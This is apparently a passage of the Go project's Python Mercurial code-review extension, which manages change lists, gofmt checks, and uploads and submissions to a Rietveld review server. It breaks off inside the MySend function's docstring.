# Strip maximal common leading white space prefix from text
def StripCommon(text):
    """Strip the maximal common leading-whitespace prefix from text.

    Blank lines are ignored when computing the prefix. Leading blank
    lines and all-but-one trailing newlines are dropped from the result.
    Returns text unchanged when it contains no non-blank lines.
    """
    # Pass 1: compute the longest whitespace prefix shared by all
    # non-blank lines.
    ws = None
    for line in text.split('\n'):
        line = line.rstrip()
        if line == '':
            continue
        white = line[:len(line)-len(line.lstrip())]
        if ws is None:
            ws = white
        else:
            common = ''
            for i in range(min(len(white), len(ws))+1):
                if white[0:i] == ws[0:i]:
                    common = white[0:i]
            ws = common
        if ws == '':
            # No common prefix is possible any more; stop early.
            break
    if ws is None:
        return text
    # Pass 2: remove the prefix and normalize blank lines.
    t = ''
    for line in text.split('\n'):
        line = line.rstrip()
        if line.startswith(ws):
            line = line[len(ws):]
        if line == '' and t == '':
            # Skip leading blank lines.
            continue
        t += line + '\n'
    # Collapse trailing blank lines down to a single final newline.
    while len(t) >= 2 and t[-2:] == '\n\n':
        t = t[:-1]
    return t
# Indent text with indent.
def Indent(text, indent):
    """Prefix every line of text with indent; the result always ends in \\n."""
    return ''.join(indent + line + '\n' for line in text.split('\n'))
# Return the first line of l
def line1(text):
    """Return the first line of text, without its newline."""
    return text.split('\n', 1)[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
#######################################################################
# Mercurial helper functions
# Return list of changed files in repository that match pats.
def ChangedFiles(ui, repo, pats, opts):
    """Sorted list of modified+added+removed files matching pats."""
    # Find list of files being operated on.
    matcher = cmdutil.match(repo, pats, opts)
    node1, node2 = cmdutil.revpair(repo, None)
    # repo.status returns (modified, added, removed, ...) tuples.
    modified, added, removed = repo.status(node1, node2, matcher)[:3]
    l = modified + added + removed
    l.sort()
    return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
    """Sorted list of modified+added (not removed) files matching pats."""
    matcher = cmdutil.match(repo, pats, opts)
    node1, node2 = cmdutil.revpair(repo, None)
    # Removed files are deliberately excluded here.
    modified, added, _ = repo.status(node1, node2, matcher)[:3]
    l = modified + added
    l.sort()
    return l
# Return list of files claimed by existing CLs
def TakenFiles(ui, repo):
    """Names of every file already claimed by some local CL."""
    return list(Taken(ui, repo).keys())
def Taken(ui, repo):
    """Map each file claimed by a local CL to the CL object claiming it."""
    claimed = {}
    for cl in LoadAllCL(ui, repo, web=False).values():
        for name in cl.files:
            claimed[name] = cl
    return claimed
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats, opts):
	"""Return changed files matching pats that no existing CL has claimed."""
	changed = ChangedFiles(ui, repo, pats, opts)
	return Sub(changed, TakenFiles(ui, repo))
def Sub(l1, l2):
	"""Return the elements of l1 that do not appear in l2, preserving l1's order."""
	return [item for item in l1 if item not in l2]
def Add(l1, l2):
	"""Return the sorted union of l1 and l2 (elements of l2 already in l1 are skipped)."""
	return sorted(l1 + [item for item in l2 if item not in l1])
def Intersect(l1, l2):
	"""Return the elements of l1 that also appear in l2, preserving l1's order."""
	return [item for item in l1 if item in l2]
def getremote(ui, repo, opts):
	"""Return the repository object for the "default" remote path."""
	# save $http_proxy; creating the HTTP repo object will
	# delete it in an attempt to "help"
	proxy = os.environ.get('http_proxy')
	source, _, _ = hg.parseurl(ui.expandpath("default"), None)
	other = hg.repository(cmdutil.remoteui(repo, opts), source)
	if proxy is not None:
		# restore the proxy setting clobbered above
		os.environ['http_proxy'] = proxy
	return other
def Incoming(ui, repo, opts):
	"""Return the changesets present on the default remote but missing locally."""
	remote = getremote(ui, repo, opts)
	return repo.findcommonincoming(remote)[1]
def EditCL(ui, repo, cl):
	"""Run the user's editor on cl's text and update cl in place.

	Loops until the edited text parses cleanly (or the user declines to
	re-edit).  Returns an error string, or "" on success.
	"""
	s = cl.EditorText()
	while True:
		s = ui.edit(s, ui.username())
		clx, line, err = ParseCL(s, cl.name)
		if err != '':
			if ui.prompt("error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err), ["&yes", "&no"], "y") == "n":
				return "change list not modified"
			continue
		# Copy the parsed fields back into the caller's CL.
		cl.desc = clx.desc;
		cl.reviewer = clx.reviewer
		cl.cc = clx.cc
		cl.files = clx.files
		if cl.desc == '':
			if ui.prompt("change list should have description\nre-edit (y/n)?", ["&yes", "&no"], "y") != "n":
				continue
		break
	return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts):
	"""Return (CL, error-string) for the CL named or implied on the command line.

	If pats[0] is a CL number, that CL is loaded; otherwise a new CL is
	built from the changed files not claimed by other CLs.
	"""
	if len(pats) > 0 and GoodCLName(pats[0]):
		if len(pats) != 1:
			return None, "cannot specify change number and file names"
		if opts.get('message'):
			return None, "cannot use -m with existing CL"
		cl, err = LoadCL(ui, repo, pats[0], web=True)
		if err != "":
			return None, err
	else:
		cl = CL("new")
		cl.local = True
		cl.files = Sub(ChangedFiles(ui, repo, pats, opts), TakenFiles(ui, repo))
		if not cl.files:
			return None, "no files changed"
	# Fold in -r/--cc additions from the command line.
	if opts.get('reviewer'):
		cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
	if opts.get('cc'):
		cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
	if cl.name == "new":
		if opts.get('message'):
			cl.desc = opts.get('message')
		else:
			err = EditCL(ui, repo, cl)
			if err != '':
				return None, err
	return cl, ""
# reposetup replaces cmdutil.match with this wrapper,
# which expands the syntax @clnumber to mean the files
# in that CL.
original_match = None
def ReplacementForCmdutilMatch(repo, pats=None, opts=None, globbed=False, default='relpath'):
	"""Wrapper for cmdutil.match that expands @clnumber patterns.

	A pattern of the form @NNNNNN is replaced by 'path:' patterns for the
	files listed in that CL.  pats/opts default to None rather than the
	mutable []/{} of the original signature (shared mutable default
	argument pitfall); None means empty, so callers are unaffected.
	"""
	if pats is None:
		pats = []
	if opts is None:
		opts = {}
	taken = []
	files = []
	for p in pats:
		if p.startswith('@'):
			taken.append(p)
			clname = p[1:]
			if not GoodCLName(clname):
				raise util.Abort("invalid CL name " + clname)
			cl, err = LoadCL(repo.ui, repo, clname, web=False)
			if err != '':
				raise util.Abort("loading CL " + clname + ": " + err)
			files = Add(files, cl.files)
	# Replace the @cl patterns with explicit path patterns.
	pats = Sub(pats, taken) + ['path:'+f for f in files]
	return original_match(repo, pats=pats, opts=opts, globbed=globbed, default=default)
def RelativePath(path, cwd):
	"""Return path relative to cwd if path lies under cwd, else path unchanged.

	Bug fix: the original tested path[len(cwd)] == '/', which raises
	IndexError when path == cwd; startswith(cwd + '/') is the safe
	equivalent.
	"""
	if path.startswith(cwd + '/'):
		return path[len(cwd)+1:]
	return path
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn=False):
	"""Check that gofmt run on the given files would not change them.

	Only files under src/ ending in .go are checked.  Raises util.Abort
	when gofmt wants to reformat (or only warns if just_warn is true).
	"""
	files = [f for f in files if f.startswith('src/') and f.endswith('.go')]
	if not files:
		return
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	try:
		cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
		cmd.stdin.close()
	except:
		raise util.Abort("gofmt: " + ExceptionDetail())
	data = cmd.stdout.read()
	errors = cmd.stderr.read()
	cmd.wait()
	if len(errors) > 0:
		ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
		return
	if len(data) > 0:
		# gofmt -l printed names of files that need reformatting.
		msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
		if just_warn:
			ui.warn("warning: " + msg + "\n")
		else:
			raise util.Abort(msg)
	return
#######################################################################
# Mercurial commands
server = "codereview.appspot.com"  # default review server; overridden by [codereview] server
server_url_base = None  # "http://<server>/", filled in by RietveldSetup
# every command must take a ui and and repo as arguments.
# opts is a dict where you can find other command line flags
#
# Other parameters are taken in order from items on the command line that
# don't start with a dash. If no default value is given in the parameter list,
# they are required.
#
def change(ui, repo, *pats, **opts):
	"""create or edit a change list
	Create or edit a change list.
	A change list is a group of files to be reviewed and submitted together,
	plus a textual description of the change.
	Change lists are referred to by simple alphanumeric names.
	Changes must be reviewed before they can be submitted.
	In the absence of options, the change command opens the
	change list for editing in the default editor.
	Deleting a change with the -d or -D flag does not affect
	the contents of the files listed in that change. To revert
	the files listed in a change, use
	hg revert @123456
	before running hg change -d 123456.
	"""
	# dirty maps CL -> True for CLs that must be flushed before returning.
	dirty = {}
	if len(pats) > 0 and GoodCLName(pats[0]):
		name = pats[0]
		if len(pats) != 1:
			return "cannot specify CL name and file patterns"
		pats = pats[1:]
		cl, err = LoadCL(ui, repo, name, web=True)
		if err != '':
			return err
		if not cl.local and (opts["stdin"] or not opts["stdout"]):
			return "cannot change non-local CL " + name
	else:
		name = "new"
		cl = CL("new")
		dirty[cl] = True
		# Seed the new CL with changed files not claimed by other CLs.
		files = ChangedFiles(ui, repo, pats, opts)
		taken = TakenFiles(ui, repo)
		files = Sub(files, taken)
	if opts["delete"] or opts["deletelocal"]:
		if opts["delete"] and opts["deletelocal"]:
			return "cannot use -d and -D together"
		flag = "-d"
		if opts["deletelocal"]:
			flag = "-D"
		if name == "new":
			return "cannot use "+flag+" with file patterns"
		if opts["stdin"] or opts["stdout"]:
			return "cannot use "+flag+" with -i or -o"
		if not cl.local:
			return "cannot change non-local CL " + name
		if opts["delete"]:
			if cl.original_author:
				return "original author must delete CL; hg change -D will remove locally"
			# -d abandons the CL on the server before deleting locally.
			PostMessage(ui, cl.name, "*** Abandoned ***", send_mail="checked")
			EditDesc(cl.name, closed="checked")
		cl.Delete(ui, repo)
		return
	if opts["stdin"]:
		# -i: replace CL fields from a change list read on stdin.
		s = sys.stdin.read()
		clx, line, err = ParseCL(s, name)
		if err != '':
			return "error parsing change list: line %d: %s" % (line, err)
		if clx.desc is not None:
			cl.desc = clx.desc;
			dirty[cl] = True
		if clx.reviewer is not None:
			cl.reviewer = clx.reviewer
			dirty[cl] = True
		if clx.cc is not None:
			cl.cc = clx.cc
			dirty[cl] = True
		if clx.files is not None:
			cl.files = clx.files
			dirty[cl] = True
	if not opts["stdin"] and not opts["stdout"]:
		# Default: open the CL in the user's editor.
		if name == "new":
			cl.files = files
		err = EditCL(ui, repo, cl)
		if err != "":
			return err
		dirty[cl] = True
	for d, _ in dirty.items():
		d.Flush(ui, repo)
	if opts["stdout"]:
		ui.write(cl.EditorText())
	elif name == "new":
		if ui.quiet:
			ui.write(cl.name)
		else:
			ui.write("CL created: " + cl.url + "\n")
	return
def code_login(ui, repo, **opts):
	"""log in to code review server
	Logs in to the code review server, saving a cookie in
	a file in your home directory.
	"""
	# MySend(None) authenticates and then returns without sending a request.
	MySend(None)
def clpatch(ui, repo, clname, **opts):
	"""import a patch from the code review server
	Imports a patch from the code review server into the local client.
	If the local client has already modified any of the files that the
	patch modifies, this command will refuse to apply the patch.
	Submitting an imported patch will keep the original author's
	name as the Author: line but add your own name to a Committer: line.
	"""
	cl, patch, err = DownloadCL(ui, repo, clname)
	argv = ["hgpatch"]
	if opts["no_incoming"]:
		argv += ["--checksync=false"]
	if err != "":
		return err
	try:
		cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=True)
	except:
		return "hgpatch: " + ExceptionDetail()
	# Feed the patch from a forked child while the parent reads hgpatch's
	# stdout (presumably to avoid a pipe deadlock — TODO confirm).
	if os.fork() == 0:
		cmd.stdin.write(patch)
		os._exit(0)
	cmd.stdin.close()
	out = cmd.stdout.read()
	if cmd.wait() != 0:
		return "hgpatch failed"
	cl.local = True
	# hgpatch's output lists the files it touched; record them in the CL.
	cl.files = out.strip().split()
	files = ChangedFiles(ui, repo, [], opts)
	extra = Sub(cl.files, files)
	if extra:
		ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
	cl.Flush(ui, repo)
	ui.write(cl.PendingText() + "\n")
def download(ui, repo, clname, **opts):
	"""download a change from the code review server
	Download prints a description of the given change list
	followed by its diff, downloaded from the code review server.
	"""
	cl, patch, err = DownloadCL(ui, repo, clname)
	if err != "":
		return err
	# Print the CL text followed by the patch itself.
	ui.write(cl.EditorText() + "\n")
	ui.write(patch + "\n")
	return
def file(ui, repo, clname, pat, *pats, **opts):
	"""assign files to or remove files from a change list
	Assign files to or (with -d) remove files from a change list.
	The -d option only removes files from the change list.
	It does not edit them or remove them from the repository.
	"""
	# The signature requires at least one pattern; recombine into one tuple.
	pats = tuple([pat] + list(pats))
	if not GoodCLName(clname):
		return "invalid CL name " + clname
	dirty = {}
	cl, err = LoadCL(ui, repo, clname, web=False)
	if err != '':
		return err
	if not cl.local:
		return "cannot change non-local CL " + clname
	files = ChangedFiles(ui, repo, pats, opts)
	if opts["delete"]:
		oldfiles = Intersect(files, cl.files)
		if oldfiles:
			if not ui.quiet:
				ui.status("# Removing files from CL. To undo:\n")
				ui.status("# cd %s\n" % (repo.root))
				for f in oldfiles:
					ui.status("# hg file %s %s\n" % (cl.name, f))
			cl.files = Sub(cl.files, oldfiles)
			cl.Flush(ui, repo)
		else:
			ui.status("no such files in CL")
		return
	if not files:
		return "no such modified files"
	files = Sub(files, cl.files)
	taken = Taken(ui, repo)
	warned = False
	# Steal files that other CLs currently claim, telling the user how to undo.
	for f in files:
		if f in taken:
			if not warned and not ui.quiet:
				ui.status("# Taking files from other CLs. To undo:\n")
				ui.status("# cd %s\n" % (repo.root))
				warned = True
			ocl = taken[f]
			if not ui.quiet:
				ui.status("# hg file %s %s\n" % (ocl.name, f))
			if ocl not in dirty:
				ocl.files = Sub(ocl.files, files)
				dirty[ocl] = True
	cl.files = Add(cl.files, files)
	dirty[cl] = True
	for d, _ in dirty.items():
		d.Flush(ui, repo)
	return
def gofmt(ui, repo, *pats, **opts):
	"""apply gofmt to modified files
	Applies gofmt to the modified files in the repository that match
	the given patterns.
	"""
	files = ChangedExistingFiles(ui, repo, pats, opts)
	files = [f for f in files if f.endswith(".go")]
	if not files:
		return "no modified go files"
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	try:
		cmd = ["gofmt", "-l"]
		if not opts["list"]:
			# Without --list, rewrite the files in place.
			cmd += ["-w"]
		if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
			raise util.Abort("gofmt did not exit cleanly")
	except error.Abort, e:
		raise
	except:
		raise util.Abort("gofmt: " + ExceptionDetail())
	return
def mail(ui, repo, *pats, **opts):
	"""mail a change for review
	Uploads a patch to the code review server and then sends mail
	to the reviewer and CC list asking for a review.
	"""
	cl, err = CommandLineCL(ui, repo, pats, opts)
	if err != "":
		return err
	cl.Upload(ui, repo, gofmt_just_warn=True)
	if not cl.reviewer:
		return "no reviewers listed in CL"
	# Compose the "Hello reviewers (cc: ...)" request message.
	pmsg = "Hello " + JoinComma(cl.reviewer)
	if cl.cc:
		pmsg += " (cc: %s)" % (', '.join(cl.cc),)
	pmsg += ",\n"
	pmsg += "\n"
	pmsg += "I'd like you to review the following change.\n"
	PostMessage(ui, cl.name, pmsg, send_mail="checked", subject=cl.Subject())
def nocommit(ui, repo, *pats, **opts):
	"""(disabled when using this extension)"""
	# Installed over the built-in commit command by uisetup/cmdtable;
	# the returned string is reported to the user as the command result.
	return "The codereview extension is enabled; do not use commit."
def pending(ui, repo, *pats, **opts):
	"""show pending changes
	Lists pending changes followed by a list of unassigned but modified files.
	"""
	m = LoadAllCL(ui, repo, web=True)
	names = m.keys()	# py2: keys() is a list we can sort in place
	names.sort()
	for name in names:
		cl = m[name]
		ui.write(cl.PendingText() + "\n")
	# Also report modified files not claimed by any CL.
	files = DefaultFiles(ui, repo, [], opts)
	if len(files) > 0:
		s = "Changed files not in any CL:\n"
		for f in files:
			s += "\t" + f + "\n"
		ui.write(s)
def reposetup(ui, repo):
	"""Per-repository extension hook: wrap cmdutil.match and configure Rietveld."""
	global original_match
	if original_match is None:
		# Install the @clnumber-expanding wrapper exactly once.
		original_match = cmdutil.match
		cmdutil.match = ReplacementForCmdutilMatch
	RietveldSetup(ui, repo)
def CheckContributor(ui, repo, user=None):
	"""Return the CONTRIBUTORS line for user (default: the configured [ui] username).

	Raises util.Abort if no username is configured or the user is not
	listed in the CONTRIBUTORS file.
	"""
	if not user:
		user = ui.config("ui", "username")
		if not user:
			raise util.Abort("[ui] username is not configured in .hgrc")
	_, userline = FindContributor(ui, repo, user, warn=False)
	if not userline:
		raise util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
	return userline
def FindContributor(ui, repo, user, warn=True):
	"""Look up user in the repository's CONTRIBUTORS file.

	Matches either the whole "Name <email>" line or just the email.
	Returns (email, line) on success, (None, None) otherwise (warning
	via ui.warn unless warn is false).

	Bug fix: the file handle was never closed (the function could return
	from inside the loop); use try/finally to close it on every path.
	"""
	try:
		f = open(repo.root + '/CONTRIBUTORS', 'r')
	except:
		raise util.Abort("cannot open %s: %s" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
	try:
		for line in f.readlines():
			line = line.rstrip()
			if line.startswith('#'):
				continue
			match = re.match(r"(.*) <(.*)>", line)
			if not match:
				continue
			if line == user or match.group(2) == user:
				return match.group(2), line
	finally:
		f.close()
	if warn:
		ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
	return None, None
def submit(ui, repo, *pats, **opts):
	"""submit change to remote repository
	Submits change to remote repository.
	Bails out if the local repository is not in sync with the remote one.
	"""
	repo.ui.quiet = True
	if not opts["no_incoming"] and Incoming(ui, repo, opts):
		return "local repository out of date; must sync before submit"
	cl, err = CommandLineCL(ui, repo, pats, opts)
	if err != "":
		return err
	user = None
	if cl.original_author:
		user = cl.original_author
	userline = CheckContributor(ui, repo, user)
	# Build the R=/TBR=/CC= trailer appended to the commit message.
	about = ""
	if cl.reviewer:
		about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
	if opts.get('tbr'):
		tbr = SplitCommaSpace(opts.get('tbr'))
		cl.reviewer = Add(cl.reviewer, tbr)
		about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
	if cl.cc:
		about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
	if not cl.reviewer:
		return "no reviewers listed in CL"
	if not cl.local:
		return "cannot submit non-local CL"
	# upload, to sync current patch and also get change number if CL is new.
	if not cl.original_author:
		cl.Upload(ui, repo, gofmt_just_warn=True)
	# check gofmt for real; allowed upload to warn in order to save CL.
	cl.Flush(ui, repo)
	CheckGofmt(ui, repo, cl.files)
	about += "%s%s\n" % (server_url_base, cl.name)
	if cl.original_author:
		about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
	# submit changes locally
	date = opts.get('date')
	if date:
		opts['date'] = util.parsedate(date)
	opts['message'] = cl.desc.rstrip() + "\n\n" + about
	if opts['dryrun']:
		print "NOT SUBMITTING:"
		print "User: ", userline
		print "Message:"
		print Indent(opts['message'], "\t")
		print "Files:"
		print Indent('\n'.join(cl.files), "\t")
		return "dry run; not submitted"
	m = match.exact(repo.root, repo.getcwd(), cl.files)
	node = repo.commit(opts['message'], userline, opts.get('date'), m)
	if not node:
		return "nothing changed"
	# Heuristic: if the new revision is not a simple child of the previous
	# tip (the commit created a new head), roll back and require a sync.
	log = repo.changelog
	rev = log.rev(node)
	parents = log.parentrevs(rev)
	if (rev-1 not in parents and
		(parents == (nullrev, nullrev) or
		len(log.heads(log.node(parents[0]))) > 1 and
		(parents[1] == nullrev or len(log.heads(log.node(parents[1]))) > 1))):
		repo.rollback()
		return "local repository out of date (created new head); must sync before submit"
	# push changes to remote.
	# if it works, we're committed.
	# if not, roll back
	other = getremote(ui, repo, opts)
	r = repo.push(other, False, None)
	if r == 0:
		repo.rollback()
		return "local repository out of date; must sync before submit"
	# we're committed. upload final patch, close review, add commit message
	changeURL = short(node)
	url = other.url()
	m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/", url)
	if m:
		# Link directly to the googlecode.com source browser when possible.
		changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
	else:
		print >>sys.stderr, "URL: ", url
	pmsg = "*** Submitted as " + changeURL + " ***\n\n" + opts['message']
	PostMessage(ui, cl.name, pmsg, send_mail="checked")
	if not cl.original_author:
		EditDesc(cl.name, closed="checked")
	cl.Delete(ui, repo)
def sync(ui, repo, **opts):
	"""synchronize with remote repository
	Incorporates recent changes from the remote repository
	into the local repository.
	"""
	if not opts["local"]:
		# Route status output through sync_note to filter pull noise.
		ui.status = sync_note
		ui.note = sync_note
		other = getremote(ui, repo, opts)
		modheads = repo.pull(other)
		err = commands.postincoming(ui, repo, modheads, True, "tip")
		if err:
			return err
	sync_changes(ui, repo)
def sync_note(msg):
	"""Pass pull/update status messages through to stdout, dropping known noise.

	sync runs pull -u in verbose mode to get the list of files being
	updated, which drags along a few messages we do not care about.
	"""
	ignored = (
		'resolving manifests\n',
		'searching for changes\n',
		"couldn't find merge tool hgmerge\n",
	)
	if msg in ignored:
		return
	sys.stdout.write(msg)
def sync_changes(ui, repo):
	"""After a pull, close CLs submitted remotely and prune unmodified files."""
	# Look through recent change log descriptions to find
	# potential references to http://.*/our-CL-number.
	# Double-check them by looking at the Rietveld log.
	get = util.cachefunc(lambda r: repo[r].changeset())
	changeiter, matchfn = cmdutil.walkchangerevs(ui, repo, [], get, {'rev': None})
	n = 0
	for st, rev, fns in changeiter:
		if st != 'iter':
			continue
		n += 1
		if n > 100:
			# Only scan the 100 most recent changesets.
			break
		desc = repo[rev].description().strip()
		for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
			if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
				ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
				cl, err = LoadCL(ui, repo, clname, web=False)
				if err != "":
					ui.warn("loading CL %s: %s\n" % (clname, err))
					continue
				EditDesc(cl.name, closed="checked")
				cl.Delete(ui, repo)
	# Remove files that are not modified from the CLs in which they appear.
	all = LoadAllCL(ui, repo, web=False)
	changed = ChangedFiles(ui, repo, [], {})
	for _, cl in all.items():
		extra = Sub(cl.files, changed)
		if extra:
			ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
			for f in extra:
				ui.warn("\t%s\n" % (f,))
			cl.files = Sub(cl.files, extra)
			cl.Flush(ui, repo)
		if not cl.files:
			ui.warn("CL %s has no files; suggest hg change -d %s\n" % (cl.name, cl.name))
	return
def uisetup(ui):
	"""Extension hook: replace the built-in commit command with nocommit."""
	if "^commit|ci" in commands.table:
		commands.table["^commit|ci"] = (nocommit, [], "")
def upload(ui, repo, name, **opts):
	"""upload diffs to the code review server
	Uploads the current modifications for a given change to the server.
	"""
	repo.ui.quiet = True
	cl, err = LoadCL(ui, repo, name, web=True)
	if err != "":
		return err
	if not cl.local:
		return "cannot upload non-local change"
	cl.Upload(ui, repo)
	# Print the CL's URL on the review server.
	print "%s%s\n" % (server_url_base, cl.name)
	return
# Option table shared by the mail and submit commands.
review_opts = [
	('r', 'reviewer', '', 'add reviewer'),
	('', 'cc', '', 'add cc'),
	('', 'tbr', '', 'add future reviewer'),
	('m', 'message', '', 'change description (for new change)'),
]
# Mercurial command table: maps command name (aliases separated by |;
# a leading ^ shows the command in the short help) to a tuple of
# (function, option list, synopsis string).
cmdtable = {
	# The ^ means to show this command in the help text that
	# is printed when running hg with no arguments.
	"^change": (
		change,
		[
			('d', 'delete', None, 'delete existing change list'),
			('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
			('i', 'stdin', None, 'read change list from standard input'),
			('o', 'stdout', None, 'print change list to standard output'),
		],
		"[-d | -D] [-i] [-o] change# or FILE ..."
	),
	"^clpatch": (
		clpatch,
		[
			('', 'no_incoming', None, 'disable check for incoming changes'),
		],
		"change#"
	),
	# Would prefer to call this codereview-login, but then
	# hg help codereview prints the help for this command
	# instead of the help for the extension.
	"code-login": (
		code_login,
		[],
		"",
	),
	"commit|ci": (
		nocommit,
		[],
		"",
	),
	"^download": (
		download,
		[],
		"change#"
	),
	"^file": (
		file,
		[
			('d', 'delete', None, 'delete files from change list (but not repository)'),
		],
		"[-d] change# FILE ..."
	),
	"^gofmt": (
		gofmt,
		[
			('l', 'list', None, 'list files that would change, but do not edit them'),
		],
		"FILE ..."
	),
	"^pending|p": (
		pending,
		[],
		"[FILE ...]"
	),
	"^mail": (
		mail,
		review_opts + [
		] + commands.walkopts,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^submit": (
		submit,
		review_opts + [
			('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
			('n', 'dryrun', None, 'make change only locally (for testing)'),
		] + commands.walkopts + commands.commitopts + commands.commitopts2,
		"[-r reviewer] [--cc cc] [change# | file ...]"
	),
	"^sync": (
		sync,
		[
			('', 'local', None, 'do not pull changes from remote repository')
		],
		"[--local]",
	),
	"^upload": (
		upload,
		[],
		"change#"
	),
}
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
# Placeholder diff uploaded when creating a new issue before a real diff exists.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
# HTML form parser
class FormParser(HTMLParser):
	"""Scrape <input> and <textarea> name/value pairs from an HTML page into self.map."""
	def __init__(self):
		self.map = {}
		self.curtag = None	# name of the <textarea> currently open, if any
		self.curdata = None	# accumulated text of that textarea
		HTMLParser.__init__(self)
	def handle_starttag(self, tag, attrs):
		if tag == "input":
			key = None
			value = ''
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
				if a[0] == 'value':
					value = a[1]
			if key is not None:
				self.map[key] = value
		if tag == "textarea":
			key = None
			for a in attrs:
				if a[0] == 'name':
					key = a[1]
			if key is not None:
				# Start accumulating text for this textarea.
				self.curtag = key
				self.curdata = ''
	def handle_endtag(self, tag):
		if tag == "textarea" and self.curtag is not None:
			self.map[self.curtag] = self.curdata
			self.curtag = None
			self.curdata = None
	def handle_charref(self, name):
		# Numeric character reference, e.g. &#65; (py2 unichr).
		self.handle_data(unichr(int(name)))
	def handle_entityref(self, name):
		import htmlentitydefs
		if name in htmlentitydefs.entitydefs:
			self.handle_data(htmlentitydefs.entitydefs[name])
		else:
			# Unknown entity: keep the literal text.
			self.handle_data("&" + name + ";")
	def handle_data(self, data):
		# Only collect text while inside a <textarea>.
		if self.curdata is not None:
			self.curdata += data
# XML parser
def XMLGet(ui, path):
	"""Fetch path from the review server and parse it as XML; None on failure."""
	try:
		data = MySend(path, force_auth=False);
	except:
		ui.warn("XMLGet %s: %s\n" % (path, ExceptionDetail()))
		return None
	return ET.XML(data)
def IsRietveldSubmitted(ui, clname, hex):
	"""Return True if the issue's Rietveld feed says it was submitted as revision hex."""
	feed = XMLGet(ui, "/rss/issue/" + clname)
	if feed is None:
		return False
	for sum in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}summary"):
		text = sum.findtext("", None).strip()
		# Match the "*** Submitted as <rev> ***" marker posted by submit.
		m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
		if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
			return True
	return False
def DownloadCL(ui, repo, clname):
	"""Download CL metadata and its latest diff from the code review server.

	Returns (cl, diffdata, error-string); cl and diffdata are None on error.
	"""
	cl, err = LoadCL(ui, repo, clname)
	if err != "":
		# Bug fix: report the actual load error; the original formatted
		# ExceptionDetail() here even though no exception is in flight.
		return None, None, "error loading CL %s: %s" % (clname, err)
	# Grab RSS feed to learn about CL
	feed = XMLGet(ui, "/rss/issue/" + clname)
	if feed is None:
		return None, None, "cannot download CL"
	# Find most recent diff
	diff = None
	prefix = 'http://' + server + '/'
	for link in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}link"):
		if link.get('rel') != 'alternate':
			continue
		text = link.get('href')
		if not text.startswith(prefix) or not text.endswith('.diff'):
			continue
		diff = text[len(prefix)-1:]
	if diff is None:
		return None, None, "CL has no diff"
	diffdata = MySend(diff, force_auth=False)
	# Find author - first entry will be author who created CL.
	nick = None
	for author in feed.findall("{http://www.w3.org/2005/Atom}entry/{http://www.w3.org/2005/Atom}author/{http://www.w3.org/2005/Atom}name"):
		nick = author.findtext("", None).strip()
		break
	if not nick:
		return None, None, "CL has no author"
	# The author is just a nickname: get the real email address.
	try:
		data = MySend("/user_popup/" + nick, force_auth=False)
	except:
		ui.warn("error looking up %s: %s\n" % (nick, ExceptionDetail()))
		cl.original_author = nick+"@needtofix"
		return cl, diffdata, ""
	match = re.match(r"<b>(.*) \((.*)\)</b>", data)
	if not match:
		return None, None, "error looking up %s: cannot parse result %s" % (nick, repr(data))
	if match.group(1) != nick and match.group(2) != nick:
		return None, None, "error looking up %s: got info for %s, %s" % (nick, match.group(1), match.group(2))
	email = match.group(1)
	# Temporary hack until we move to the public code review server.
	email1, _ = FindContributor(ui, repo, email, warn=False)
	if email1 == "":
		email = re.sub("@google.com$", "@golang.org", email)
	# Print warning if email is not in CONTRIBUTORS file.
	FindContributor(ui, repo, email)
	cl.original_author = email
	return cl, diffdata, ""
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend(request_path, payload=None,
				content_type="application/octet-stream",
				timeout=None, force_auth=True,
				**kwargs):
	"""Sends an RPC and returns the response.

	Args:
